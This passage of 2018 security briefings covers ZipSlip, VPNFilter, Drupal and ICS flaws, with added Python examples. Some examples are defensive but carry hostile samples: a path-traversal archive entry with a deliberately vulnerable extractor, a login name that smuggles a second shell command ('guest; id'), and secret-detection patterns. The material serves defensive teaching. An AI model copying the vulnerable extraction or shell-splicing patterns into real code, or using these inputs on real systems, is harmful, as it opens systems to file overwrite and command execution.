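        # ZipInfo stores the name verbatim; attackers use any tool that does
        # not normalise entry names, and the format itself does not forbid this.
        zf.writestr(zipfile.ZipInfo("../escaped.txt"), "owned\n")
    return buf.getvalue()


def vulnerable_extract(archive: bytes, dest: str) -> List[str]:
    """The StackOverflow-style loop: join the entry name to dest and write."""
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)  # '../' survives the join
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as out:
                out.write(zf.read(info))
            written.append(target)
    return written


def unsafe_name(name: str) -> bool:
    """Absolute paths, drive letters, and any '..' component are refused outright."""
    parts = name.replace("\\", "/").split("/")
    return os.path.isabs(name) or name.startswith(("/", "\\")) or ".." in parts or ":" in parts[0]


def safe_target(root: str, name: str) -> str:
    """Resolve an entry under root, raising if it would land outside it."""
    if unsafe_name(name):
        raise ValueError(f"refusing entry with unsafe name: {name!r}")
    target = os.path.realpath(os.path.join(root, name))
    # realpath collapses anything the name check missed; the prefix test is the gate.
    if os.path.commonpath([root, target]) != root:
        raise ValueError(f"entry escapes destination: {name!r}")
    return target


def safe_extract(archive: bytes, dest: str) -> List[str]:
    """Validate every entry before writing anything, so a bad archive is rejected whole."""
    root = os.path.realpath(dest)
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        plan = [(info, safe_target(root, info.filename)) for info in zf.infolist()]
        for info, target in plan:
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as out:
                out.write(zf.read(info))
            written.append(target)
    return written


def demo() -> dict:
    """Run both extractors in a scratch tree and report what each one did."""
    base = tempfile.mkdtemp(prefix="zipslip-")
    archive = build_malicious_zip()

    dest = os.path.join(base, "extract")
    os.makedirs(dest)
    vulnerable_extract(archive, dest)
    escaped = os.path.join(base, "escaped.txt")  # one level above dest

    safe_dest = os.path.join(base, "safe")
    os.makedirs(safe_dest)
    try:
        safe_extract(archive, safe_dest)
        rejected = False
    except ValueError:
        rejected = True

    return {
        "escaped_file_written": os.path.exists(escaped),
        "safe_extract_rejected": rejected,
        "safe_dest_contents": sorted(os.listdir(safe_dest)),
    }


if __name__ == "__main__":
    print(demo())
```

Two design points carry over to any language: reject the archive as a whole rather than extracting the good entries and skipping the bad one (a half-extracted tree is its own failure mode), and decide containment on the resolved path, not on the entry name alone, since a name check on its own misses symlink tricks and platform-specific separators.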

The researchers who discovered this issue have identified a number of common applications that carry the vulnerability, including the Apache projects Ant, Hadoop, Hive, Maven, and Storm.  A comprehensive list of these applications can be found at:


The impact of this vulnerability will differ from environment to environment, depending on the software packages deployed.  However, should an organization be using one of the affected and identified applications, a malicious actor could deliver a specially-crafted archive file to the victim program and cause a full system compromise simply by having the file extracted.  Because of how widely such code snippets are shared, and the lack of safe defaults in the affected libraries, it is highly likely that this issue far exceeds the currently identified scope.


Our recommendations fall into two separate categories:

Developers and Enterprise Development operations:

Evaluate the quality of shared code, and fully test it for edge cases before implementation.

Integrate the use of shared code evaluation into the DevOps process.

Select and adopt a standard set of libraries for core application functions, and document and standardize on its implementation based on testing results.

Carefully select development languages at the start of any new project, taking into account the use of well developed core libraries essential to the success of the project.

Enterprise adopters:

Perform robust and regular testing of all application input functions at time of adoption and during major code updates or releases.

When possible, perform regular code audits of open source projects in use in the organization in order to discover similar failures.

When possible, encourage your software vendors to perform regular code audits in order to discover similar failures.  Ask them to share the results (under NDA or otherwise) so that proper risk decisions and corrective actions can be made.

Ultimately all organizations should be mindful of the ZipSlip vulnerability, patch the currently identified vulnerable applications, and watch for additional discoveries.  Remember, this specific disclosure has exposed a general weakness in archive handling that was previously unknown or only narrowly known, and it may enable many more exploits.

Additional Resources

ZipSlip Overview:

ZipSlip Release and White Paper:

Current list of known vulnerable software and patch status:


05/29/2018 New “VPNFilter” malware targets at least 500K networking devices worldwide.


Dubbed “VPNFilter” by Cisco’s Talos research group, this multi-stage, modular platform has versatile capabilities supporting both intelligence collection and destructive cyber attack operations. The first stage persists through a device reboot, enabling download of the other stages and full reinfection. It also redundantly maintains the IP address(es) of second-stage deployments, enabling robust maintenance of the malware command and control (C2) environment even in the face of unpredictable changes, such as those occurring as system administrators attempt to track and remove the malware.


The code collects intelligence (scans) and has multiple attack features that can either execute additional commands or simply “brick” a device. From the Talos blog, “… the code of this malware overlaps with versions of the BlackEnergy malware — which was responsible for multiple large-scale attacks that targeted devices in Ukraine.” That overlap with known attack code and two separate upticks in malware on Ukrainian IP addresses in mid-May 2018 prompted Talos to release information before completing full analysis. 

VPNFilter includes modules that use the Tor anonymity network to mask C2 IP addresses and foster misattribution. It is designed to attack devices on the perimeter of the network, where no intrusion prevention system (IPS) is in place and where there is typically no host-based protection such as an anti-virus (AV) package available.

Specific commands supported by the malware include:

  • kill: Overwrites the first 5,000 bytes of /dev/mtdblock0 with zeros, and reboots the device (effectively bricking it).
  • exec: Executes a shell command or plugin.
  • tor: Sets the Tor configuration flag (0 or 1).
  • copy: Copies a file from the client to the bad actor’s remote server.

The inherent destructive capability is of particular concern because it allows the operators of this malware to ‘brick’ the edge devices of any infected organization, cutting its network connections. That would eliminate remote operations control for ICS/SCADA systems, as well as shut down any other network connections. The combination of intelligence gathering and mapping seems aimed at finding systems from which to launch effective attacks.


  • Reset SOHO routers and directly-connected NAS devices to factory settings, then update them with current, non-vulnerable firmware.
  • Work with ISPs to reset devices provided by ISPs.
  • For any directly connected device that may be infected or is otherwise suspect, contact and work closely with the manufacturer to ensure the device has up-to-date firmware and is not infected.
  • ISPs should also work aggressively with customers to address potential problems.

This is a harbinger of IoT risks that will likely become more common. The ‘heat’ map in the SDX Central article below shows that, at least so far, this is clearly targeting (or being tested against) Ukraine, and the code overlap suggests a direct descendant of the previously-discovered Russian malware BlackEnergy. It has, however, also been discovered in 54 other countries so far. It is not going away.

Additional Resources

Cisco Talos Group blog warns of “VPNFilter” malware

SDX Central – Cisco Warns Massive Russian Malware Attack Hit 500K Routers Globally

IBM X-Force report on Russian malware BlackEnergy 


05/21/2018 New PDF malware combines recent Windows & Adobe exploits


New PDF malware combines two zero-day exploits, discovered as recently as last week.  The malware, detected by anti-malware firm ESET, combines the most recent Windows and Adobe exploits to compromise Microsoft Windows systems.  The patches for the flaws being exploited have only been available for a short time; Microsoft released its patch on May 8th, and Adobe released security patches for Reader and Acrobat on May 14th.  The PDF malware in question compromises Windows systems when a user opens a malicious PDF on an unpatched system.  The Adobe Reader flaw gives the attacker code execution when the PDF is opened, and the Windows kernel flaw escalates that code to S
ystem-level privileges.  The major impact of this is that two new zero-day exploits were found together in a malicious PDF file, in the wild.


The impact of combining two zero days into a single piece of malware could be devastating.  How many systems were hit before the patches?  The end result is not known at this time.  The sample identified by ESET did not contain a final payload, so the ultimate goal of the malware is not known.  That said, the malware is sophisticated, and the zero-day exploits embedded in it are more so.


With zero-day exploits in the wild it is usually too late to simply patch your systems.  We are by no means advocating delaying patches, but at this time it is advisable to engage an internal hunt team to identify vulnerable and/or compromised systems.  This is a good reminder that we need to implement the basics first: patch and vulnerability management, software and data inventory, governance, and so on.  Once those are shored up, start to look at additional segmentation, access management, application firewalls, and application whitelisting.  Zero-day exploits are in the wild, and our organizations have to evolve to be resilient against exploits for which we do not yet have patches.

Additional Resources

Microsoft Patch for CVE-2018-8120

Adobe Security Bulletin:

Anton Cherepanov Blog on the two zero days found in PDF malware


05/14/2018 Industrial Control System product vendor Schneider Electric’s InduSoft and InTouch products contain critical security vulnerabilities.


Schneider Electric makes products that allow HMI clients to read and write tags and to monitor alarms and events.  Its InduSoft Web Studio and InTouch Machine Edition software is vulnerable to remote compromise, and should be patched immediately.


Schneider Electric’s software is often deployed on critical Industrial Control Systems, and its InduSoft and InTouch applications are vulnerable to remote compromise.  The vulnerable software runs with a high privilege level, so compromised systems should be completely wiped and reinstalled before being put back into production.  Given the severity of the vulnerability and the criticality of the systems, we rate the impact as high.


InGuardians recommends the following steps be taken:

  1. Identify if you run either of the two applications – software inventory
  2. If running the software, ensure that it is running on isolated network segments
  3. Check production systems for indicators of compromise
  4. Patch vulnerable systems and/or rebuild compromised systems

Additional Resources

Schneider Electric Security Bulletin LFSEC00000125

Schneider Electric InduSoft Web Studio and InTouch Machine Edition Remote Code Execution (Tenable Research Advisory Detail)


Tenable Research Advisory: Critical Schneider Electric InduSoft Web Studio and InTouch Machine Edition Vulnerability

05/07/2018 Plaintext Passwords Exposed on Twitter and Github, Suggesting Password Safes and MFA


Last week, both Twitter and GitHub publicly announced that their services had recorded plaintext passwords in internal log streams. While neither company has disclosed a compromise, mature information security programs assume that at least one machine in the organization is under the control of a bad actor, and thus that any cleartext password must be replaced. Twitter has begun requiring some users to change passwords; GitHub has made no such requirement. It would behoove all users of both Twitter and GitHub to assume their passwords are compromised.


If one or more bad actors have compromised either Twitter or GitHub, they may possess your organization’s credentials for the respective service. If your organization uses multi-factor authentication (MFA/2FA) on those accounts, the bad actors will likely not have gained access with those credentials alone.

A GitHub account compromise produces significant risk in multiple ways. First, if a bad actor can alter code stored on GitHub that a user deploys to your or their own systems, they can achieve an indirect compromise of those systems and any systems accessible by them. Second, a bad actor may find access credentials, private certificate keys, or other secrets stored in GitHub. InGuardians often finds this kind of data in its red team penetration tests, particularly API keys that provide full cloud service administration capabilities. Finally, when targeting a DevOps environment, a bad actor with GitHub access gains full knowledge of routing, firewall and system provisioning code.


InGuardians recommends changing all organization accounts on both Twitter and GitHub. Given the tendency for code and data to proliferate to both personal and business GitHub accounts, InGuardians recommends requiring all staff to change their personal and business GitHub passwords and implement multi-factor authentication on that platform.  

InGuardians also recommends deploying password safe software or hardware, whether free or commercial, to ensure that every password an organization uses is unique. Bad actors will gain access to passwords – to understand, contain and recover from the damage, it's important to make sure that compromised passwords are useful only on one service.

Further, InGuardians recommends conducting a quarterly internal review of what code, data and secrets lie in GitHub repositories, to both understand and reduce the amount of sensitive or secret information that is entrusted there.
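
One way to start such a review is to scan repository contents for the kinds of secrets the briefing describes (cloud access keys, private keys). The following is an added example, not part of the original briefing and not an InGuardians tool; the AWS access key ID prefix and the PEM header are real formats, the generic key/token rule is a heuristic constructed for this example, and the sample repository contents are constructed (the key ID is Amazon's documented example value).

```python
import re

# Detection rules.  The AWS access key ID format (AKIA + 16 uppercase
# alphanumerics) and the PEM private-key header are real formats; the
# generic key/token rule is a heuristic constructed for this example.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    "generic_api_key": re.compile(
        r"(?i)\b(?:api[_-]?key|secret[_-]?key|token)\b\s*[=:]\s*['\"]?([A-Za-z0-9_\-]{20,})"
    ),
}


def redact(token):
    """Keep enough of a hit to locate it in the file without re-exposing it."""
    return token[:6] + "..." + token[-2:] if len(token) > 10 else "***"


def scan_text(path, text):
    """Return one finding per (rule, line): (path, line_no, rule, redacted_match)."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in SECRET_PATTERNS.items():
            match = pattern.search(line)
            if match:
                findings.append((path, line_no, rule, redact(match.group(0))))
    return findings


def scan_repo(files):
    """files maps a repository path to its contents (e.g. from `git ls-files`)."""
    findings = []
    for path, text in sorted(files.items()):
        findings.extend(scan_text(path, text))
    return findings


# Constructed sample repository; the key ID is Amazon's documented example value.
SAMPLE_REPO = {
    "terraform/provider.tf": 'provider "aws" {\n  access_key = "AKIAIOSFODNN7EXAMPLE"\n  region     = "us-east-1"\n}\n',
    "deploy/id_rsa": "-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEA...\n-----END RSA PRIVATE KEY-----\n",
    "config/settings.yml": "api_key: 0123456789abcdefghij0123\n",
    "README.md": "Run `make deploy` after setting AWS_PROFILE.\n",
}

if __name__ == "__main__":
    for finding in scan_repo(SAMPLE_REPO):
        print("%s:%d %s %s" % finding)
```

Findings are reported redacted so the review itself does not copy secrets into tickets or chat; a hit on an access key should be treated as a rotation task, not only a cleanup of the file, since the repository history still contains it.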

Additional Resources

Twitter Admits Recording Plaintext Passwords in Internal Logs, Just Like GitHub

GitHub Accidentally Recorded Some Plaintext Passwords in Its Internal Logs


04/30/2018 Multiple known Java and HPE iLO vulnerabilities being targeted for ransomware


Software management is often boring. It is, however, essential to business survival. The many “new” attacks that grab media attention all too often exploit known vulnerabilities for which patches have been published – and missed or ignored. Atlanta’s recent ransomware attack exploited Java’s deserialization bug, which was called the most under-hyped vulnerability of 2015.

It is NOT just Java. HPE iLO, an integrated remote management console for HP servers, has many known vulnerabilities. They are now being hit with disconnect and lock-out ransom demands. This one may not be encrypting drives, but instead is remotely locking out administrators. The effect and impetus for ransom is the same.


Atlanta’s one case has so far incurred $2.6 million in external consulting costs. There is no capture of internal costs or disruption effects, and as of this writing Atlanta’s departments are still using paper and other offline tools. In many commercial environments, this is a business killer. The iLO attacks effectively take servers offline – they are no longer under your control.

Any unpatched or unresolved vulnerability is an opportunity for exploitation and disaster. Delays in patching increase the window of vulnerability and the likelihood of exploitation. A ‘standardized’ weekly or monthly or worse patch cycle, if known publicly, advertises an organization’s unpreparedness. E.g., Outfit A, Inc., patches on the first Monday of the month; a vulnerability and patch are published in the second week; attackers can posit Outfit A will remain vulnerable AT LEAST 3 weeks … and maybe even into more than one cycle.


1. Do frequent and aperiodic vulnerability assessments. Scan for vulnerabilities and create a realistic, prioritized, ACTION list.

2. Pay attention to other organizations, news, and vulnerability announcements.

3. PATCH. Just Do It. When patches are more complex, mitigate with layered defenses and architecture – network segmentation.

4. Review policy and architecture to ensure systems that should NOT face the internet, such as HPE iLO interfaces, DON’T.

5. And do not let anyone tell you to relax, it’s only a “theoretical vulnerability.” Ever.

In 2015 the Java vulnerabilities “were considered to be theoretical and hard to exploit.”(1)

STOP. That mistaken viewpoint goes back decades – was wrong then and is wrong now. 

Additional Resources

Atlanta fall-out continues

2018 – Atlanta projected to spend at least $2.6 million on ransomware recovery

This is NOT new – it’s been skipped and left to fester:

2015 – Java Serialization Vulnerability Threatens Millions of Applications

… and it persists

2018 – Cisco Secure Access Control System Java Deserialization Vulnerability

(1) 2016 – Lessons Learned from the Java Deserialization Bug

And it is NOT just Java

2018 – Ransomware Hits HPE iLO Remote Management Interfaces

The CVE list of HPE iLO vulnerabilities:

04/23/2018 Attackers Compromising Drupal-based Web Sites En Masse for Financial Gain
Attackers are using two vulnerabilities, including Drupalgeddon2, to compromise Drupal installations, install DDoS and currency-mining malware, and attack non-Drupal machines made accessible by that foothold.

The impact for organizations which run Drupal now (or ran it at any time since March 28th, 2018) is severe. Multiple organized criminal groups have raced to exploit the first vulnerability, named Drupalgeddon2. The most prolific uses malware named “Muhstik,” which infects a host, then spreads to other machines using SSH and WebDav, as well as exploits against the Drupalgeddon2 vulnerability and vulnerabilities in Oracle’s WebLogic, ClipBucket, Webuzo, and the WordPress content management system. Muhstik is a variant of Tsunami, which has infected tens of thousands of Linux hosts. Muhstik has built a botnet from servers and Internet of Things (IoT) “smart devices,” allowing it to scan the Internet for vulnerable hosts very quickly.

For any site that ran Drupal since March 28th, it’s critical to patch the Drupal software immediately. InGuardians further recommends assuming that Internet-facing Drupal installations have been compromised, until that assertion can be ruled out. The Muhstik malware doesn’t spread only using software vulnerabilities. It also scans for SSH servers, trying both a pre-populated set of password possibilities as well as credentials that it finds on the system from which it runs. If Muhstik compromised a single Drupal system, it has likely spread to other systems.

InGuardians has seen many clients use a best practice approach to content management system-provided websites. These clients bifurcate their Drupal application servers into two servers: an internal dynamic server and an external static server. The internal server runs the content management system (Drupal) to allow organization staff to update the site’s content. On any update, this server pushes a static mirror of the site to the external server.  The external server serves content statically, exposing far less code to attackers. This can be accomplished on Drupal using the Static Generator module.

Additionally, InGuardians recommends disallowing root login via SSH and relocating the SSH server port from 22 to a less well-known number. These two measures massively reduce the number of successful SSH-based attacks, whether in initial infection or lateral movement.
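
The two SSH recommendations above can be checked mechanically across a fleet. The following is an added example, not part of the original briefing and not an InGuardians tool; it parses an sshd_config the way sshd does (first value of a repeated keyword wins, directives after a Match line are conditional) and reports settings that conflict with the recommendations. The OpenSSH defaults and the two constructed sample configurations are this example's own.

```python
# OpenSSH defaults that apply when a directive is absent (PermitRootLogin has
# defaulted to prohibit-password since OpenSSH 7.0).
DEFAULTS = {"port": "22", "permitrootlogin": "prohibit-password", "passwordauthentication": "yes"}


def parse_sshd_config(text):
    """Collect global directives from sshd_config.

    sshd uses the FIRST value given for a repeated keyword, and anything after
    a 'Match' line applies only conditionally, so parsing stops there.
    Keywords are case-insensitive; they are stored lower-cased.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break
        settings.setdefault(key, value)
    return settings


def audit_sshd_config(text):
    """Return (keyword, observed, advice) for each setting that conflicts with
    the recommendations above; an empty list means the config passes."""
    settings = parse_sshd_config(text)
    effective = {k: settings.get(k, v) for k, v in DEFAULTS.items()}
    findings = []
    if effective["permitrootlogin"].lower() == "yes":
        findings.append(("PermitRootLogin", effective["permitrootlogin"], "set PermitRootLogin no"))
    if effective["passwordauthentication"].lower() == "yes":
        findings.append(("PasswordAuthentication", effective["passwordauthentication"],
                         "set PasswordAuthentication no; Muhstik guesses passwords, not keys"))
    if effective["port"] == "22":
        findings.append(("Port", "22", "move sshd to a less well-known port"))
    return findings


# Constructed configurations: a default-style file and a hardened one.
WEAK_CONFIG = """\
# Default-style sshd_config
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""

HARDENED_CONFIG = """\
Port 2222
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
Match User backup
    PasswordAuthentication yes   # conditional; not a global setting
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_sshd_config(cfg))
```

Disabling password authentication is included because Muhstik's SSH spreading relies on guessed or harvested passwords; moving the port reduces noise from automated scanning but is not a substitute for the first two settings.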

Additional Resources
Drupal Patch Instructions for Drupalgeddon2

Drupal Static Generator Module

Botnet Muhstik is Actively Exploiting Drupal CVE-2018-7600 in a Worm Style (Netlab at

Big IoT Botnet Starts Large-Scale Exploitation of Drupalgeddon 2 Vulnerability (Bleeping Computer)

04/16/2018 Researchers Can Hijack ATI Systems’ Emergency Alert Sirens Using Software Defined Radio (SDR)
Security researchers at Bastille Networks were able to capture, analyze and replay packets to trigger emergency alert sirens in the city of San Francisco provided by ATI Systems.  Over a 2 year period, researchers captured the weekly transmission to initiate system tests.  Upon analyzing the captured radio protocol, it was discovered that the transmissions were neither encrypted nor authenticated.

While the ATI Systems emergency alert sirens are a unique implementation, the vulnerability in these systems extends to those installed outside of San Francisco, with identical systems deployed across the globe. Attacks against these types of systems are not unique; it is theorized that similar attacks were used in the erroneous activation of the tornado warning sirens in Dallas, Texas.

Adoption of proprietary Radio Frequency (RF) systems is quite common in both legacy and current systems. InGuardians often finds that organizations do not have an accurate inventory of RF-enabled systems in their environment, nor do they understand the overall implications of compromise of the unknown RF-enabled systems.

This proof of concept is specific to the ATI Systems implementations, which by design, could cause widespread panic should the emergency sirens be triggered by an attacker.  However, a bad actor or researcher could use the overall methodology and tools for discovering an attack surface for this system on other RF-enabled systems.  Overall impact to an organization will depend on the affected system discovered and analyzed, but it is not outside the realm of possibility that there could be pecuniary or life safety issues.

With the increased development in Software Defined Radio (SDR) and expertise in these tools being gained by the security community, RF protocols that formerly enjoyed “security through obscurity” are unlikely to remain free from attack much longer.  This becomes particularly challenging in legacy systems where the RF protocols were designed with obscurity as the only security measure either due to lack of available technology, or little future consideration in technology advancements.

InGuardians recommends its clients perform or commission an overall discovery of RF-enabled systems in the enterprise environment, followed by a thorough risk analysis. Should the risk impact be determined to be elevated for any of the discovered systems, it is recommended, at a minimum, to contact the vendor in order to determine the methods in use for securing, encrypting, and authenticating transmissions.  Should the answers from the vendor be insufficient, or the RF-enabled systems be critical to the operation of the business, a thorough review and analysis of the RF transmissions should be performed.

Additional Resources

Dallas Tornado Siren Hack [Washington Post]

04/09/2018 Security vulnerabilities in two Moxa Industrial Control Systems (ICS) devices

There are security vulnerabilities in two Moxa ICS devices: MXview network management software and the AWK-3131A 802.11n ICS wireless gear.    The management software has a flaw that would allow an attacker to view/retrieve the cryptographic key on the server.  The wireless gear has a flaw that allows an unauthenticated user to execute commands on the system.

Impact
The first vulnerability affects Moxa’s AWK-3131A 802.11n ICS wireless network gear.  This was reported initially by Cisco Talos in December 2017, and patched by Moxa on April 3.  The vulnerability is present due to the way Moxa is using ‘loginutils’ to parse failed logins, allowing attackers to use a semicolon to terminate the login and follow it with a command to be executed.  Cisco Talos has stated that it believes the web front end is  also vulnerable to the attacks, as it also uses ‘loginutils’ to parse the failed logins.  The vulnerability was successfully exploited via ‘Telnet’, ‘SSH’, and the local management console.
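
The flaw class described above, untrusted login text reaching a shell, is easiest to understand next to its fix. The following is an added example, not Moxa's code and not part of the original briefing: a failed-login logger written the vulnerable way (never executed here, kept only for comparison) beside two hardened forms, one that passes arguments without a shell and one that validates the name against an allowlist and logs it as data. The allowlist, the function names and the constructed login attempt are this example's own.

```python
import logging
import re
import shlex

# --- Vulnerable pattern (kept only for comparison; never executed here) ------
# The attempted login name is spliced into a shell command line.  A name
# containing ';' ends the intended command and the shell runs whatever
# follows as a second command.  This is the class of flaw described above.
def build_log_command_unsafe(username):
    return "logger -t login failed_login_for_%s" % username


# --- Hardened pattern 1: no shell parsing of untrusted text ------------------
# Passing an argv list (subprocess.run(argv) with shell=False) hands the
# username to the program as one argument; ';' is just a character in it.
def build_log_command_safe(username):
    return ["logger", "-t", "login", "failed login for %s" % username]


# If a shell string is unavoidable, quote the untrusted piece.
def build_log_command_quoted(username):
    return "logger -t login %s" % shlex.quote("failed login for %s" % username)


# --- Hardened pattern 2: validate, then log without any shell ----------------
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")   # allowlist; assumption for this example


def is_valid_username(username):
    return bool(USERNAME_RE.match(username))


def record_failed_login(username, log=logging.getLogger("login")):
    """Returns 'rejected' for names outside the allowlist, 'logged' otherwise.
    Either way the name reaches the log as data, never as a command."""
    if not is_valid_username(username):
        log.warning("failed login, invalid username %r", username)
        return "rejected"
    log.warning("failed login for %s", username)
    return "logged"


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    attempt = "guest; id"     # constructed: a name carrying a second command
    print(build_log_command_unsafe(attempt))   # a shell would run 'id' after logger
    print(build_log_command_safe(attempt))     # one argument, no second command
    print(record_failed_login(attempt))
```

The lesson for reviewing vendor firmware or your own tooling: any path where a login name, hostname or other network-supplied string is concatenated into a shell command (Telnet, SSH and console logins all carry the same text) needs either an argv list or quoting, and ideally no shell at all.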

The second vulnerability is in Moxa’s MXview network management software, and allows an attacker to retrieve the private key for the server.  Obtaining the cryptographic private key would allow the attacker to decrypt files and traffic.  The flaw is considered severe enough for DHS to have issued an advisory on April 5.  This follows a flaw in the same product discovered in January, which allows attackers to use an “unquoted search path” in order to execute code or gain access to files on the server.

First and foremost, it is important to deploy ICS devices on an isolated network segment to ensure that they are not accessible from the Internet.  InGuardians recommends that you deploy ICS networks and devices behind firewalls and other network controls, isolating them from the business network.  InGuardians also recommends performing routine risk assessments to ensure that controls and audit measures are working properly.

As for these specific vulnerabilities, Moxa released patches last week (link in the Additional Resources below).

Additional Resources
DHS advisory:

NCCIC document on recommended practices for securing ICS

* Moxa MXview advisory:

* Moxa MXview site:

* Moxa AWK-3131A

*N.B. the Moxa site is badly designed, with no clear and easy way to view security updates and advisories.

04/02/2018 Drupal CMS High-Critical Remote Code Execution Vulnerability
Security researchers have discovered and publicly released several Highly-Critical Remote Code Execution (RCE) vulnerabilities in Drupal versions 7 through 8.5, as well as the end-of-life version 6.  Due to the serious nature of these remote code execution vulnerabilities, Drupal has released patches for older, unsupported versions including version 6.

The Drupal Content Management System (CMS) powers 6% of the 10,000 most popular public web sites. Over 647,000 publicly-accessible web sites use this software. This may increase the risk that bad actors may either quickly attack companies running Drupal or will create and release malware targeting this software.

Remote code execution vulnerabilities like these allow an attacker to execute code of their own choosing on an unpatched installation. This could ultimately result in full system compromise and/or allow the attacker to move laterally to compromise other machines, including those on internal network segments.

InGuardians often finds that organizations do not have an accurate inventory of Internet-facing hosts or the applications which they host.  In these cases, application vulnerabilities are particularly challenging to defend, as it is impossible to update software that isn’t known to the patch management staff.

Unless Drupal CMS versions are updated to 7.58 or 8.51,  it is possible for an attacker to gain full control of the affected system. Drupal CMS version 6 permits the same behavior unless patched against SA-CORE-2018-2. Depending on the attacker’s skillset, as well as the defender’s level of network segmentation, it is possible that an attacker could take full control of the defender’s infrastructure.

InGuardians recommends immediate patching of the Drupal content management system (CMS) across all versions.  Until such time as a patch can be applied, InGuardians recommends that affected organizations restrict access severely to a few trusted IP addresses.  This restriction should only be utilized to perform appropriate upgrades and patches, before restoring full access.

This is also the perfect opportunity to undergo an aggressive look at internet-facing resources in order to develop an accurate inventory, with the intent of finding previously unknown assets including Drupal.  Upon completion of internet-facing asset discovery, InGuardians recommends performing a similar discovery on internal network segments.

Additional Resources 
Drupal core – Highly critical – Remote Code Execution – SA-CORE-2018-002
FAQ about SA-CORE-2018-002
CMS Usage Statistics

03/28/2018 Municipal governments battle cyber attacks.

The Georgia cities of Atlanta and Loganville are the latest victims in an ongoing trend of attacks on municipalities. First, on Thursday, March 22nd, the City of Atlanta announced that its networks had been shut down due to a ransomware attack. At the time of this posting, the city is working with the FBI and the Department of Homeland Security, as well as external partners from Microsoft and Cisco’s cybersecurity response team, to investigate the situation.

The City of Loganville (a suburb of Atlanta), announced on Monday, March 26th on its Facebook page that an external threat actor had successfully perpetrated a breach of an internal server. The Loganville breach may not be related to that of Atlanta.

In Atlanta, the ransomware has cut off electronic access to court records, while many departments are using pen and paper to perform their duties. Many city services, such as electronic bill pay, are still unavailable to city residents. As a precautionary measure, the public wireless network (Wi-Fi) at Hartsfield-Jackson airport has also been suspended.

Evidence suggests the Atlanta malware is SamSam, which has been seen in other government-targeted attacks, like the one that occurred at Colorado’s state Department of Transportation.  In particular, the letter shared by local media during the early stages of the ransomware infection in Atlanta is clearly a SamSam ransom note. The wording — including typos — is identical to the examples shared by researchers working for Cisco’s Talos group earlier this year. The only difference was the directory where the contact portal is hosted.

Once attribution to SamSam became public knowledge, the SamSam group deleted the contact portal that the city of Atlanta would use to make payment. Given the SamSam group’s actions, it isn’t clear if payment is even possible now. While it is possible other portals exist for the systems infected in Atlanta, the city hasn’t released any technical details to the public.

In Loganville, the breach is believed to have exposed personally identifiable information (PII), such as social security numbers, to the attacker.

InGuardians echoes the sentiments of the newly elected Atlanta Mayor who is quoted as saying, “this is bigger than a ransomware attack, it’s an attack on government and therefore an attack on all of us.”

It is increasingly apparent that organizations must make the resources available and establish effective policies and preventative measures to strengthen their security postures in order to mitigate these threats.

InGuardians recommends that all leaders of municipal governments view themselves as a likely soft target and create internal Information Security programs to address the emerging threats. We also recommend that all business leaders continue to follow this case for lessons learned, such as:

  • Do not leave Remote Desktop Protocol (RDP), Windows Server Message Block (SMB), Secure Shell (SSH) or Telnet available to the Internet – use VPNs and firewall white lists
  • Confirm that no operating systems use SMB version 1
  • Apply Windows group policy objects (GPOs) to harden government systems uniformly
  • Do not allow users to have local administrative privilege on their desktop machines
  • Make sure that all patches are deployed quickly – malware victims have lost a race with an attacker

Additional Resources

Small Towns Confront Big Cyber Risks (GovTech)

Atlanta Working “Around the Clock” to Fight Off Ransomware Attack (NPR)

We Are a Resilient City – Atlanta Works to Move Forward Following Cyber Attack (11Alive)

Metro Atlanta City Reports Its Own Data Breach (Atlanta Journal Constitution)

Atlanta’s Computers Crippled by Ransomware – Issues Unresolved After 4 Days (SmartCities Dive)

03/19/2018 New DHS alert on breaches of power grid and other control systems

Disabling safety or security controls invalidates risk assessment and mitigation.  It won’t matter whether the control was disabled by a hacker or by an employee.

New information is surfacing about the breach of control systems first identified in August 2017.  One conceptual flaw and one implementation or operating error combined to defeat safety systems and shut down systems.

In a SCADA environment, the TRICONEX system is a sound concept, using triple redundancy comparison of signals as a check of proper operating conditions. If one of the 3 is different, the system enters a safety condition with appropriate alerts and changes. That could mean opening valves to increase cooling, or shutting fuel valves to stop machinery. The firmware of the controllers can, of course, be updated.

To ensure security, a physical switch is used to change it from “read only” to “read-write” for updates. A variety of implementation factors, from remote locations to limited personnel managing large automated systems, may have contributed to operators leaving systems in read-write. In at least one case, one of the maintenance management computers was compromised allowing hackers access to now fully modifiable controllers. In another case, the SCADA system was on a larger network and not properly isolated from external connections leaving it vulnerable to external penetration.
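
The two mechanisms just described, the three-channel comparison and the physical key switch that gates firmware writes, can be modelled in a few lines, which makes the operational failure (controllers left in read-write) concrete. The following is an added example, a simplified model and not Triconex code or part of the original briefing; the controller names, tolerance, key-position labels and readings are constructed.

```python
from dataclasses import dataclass, field
from typing import List, Sequence

SAFE_STATE = "SAFE_SHUTDOWN"   # e.g. close fuel valves, open cooling valves
NORMAL = "NORMAL"


def channels_agree(readings: Sequence[float], tolerance: float) -> bool:
    """True when every pair of the three channels is within tolerance."""
    a, b, c = readings
    return abs(a - b) <= tolerance and abs(b - c) <= tolerance and abs(a - c) <= tolerance


@dataclass
class SafetyController:
    name: str
    key_position: str = "RUN"          # RUN = read-only; PROGRAM = read-write
    firmware: str = "1.0"
    alerts: List[str] = field(default_factory=list)

    def evaluate(self, readings: Sequence[float], tolerance: float = 0.5) -> str:
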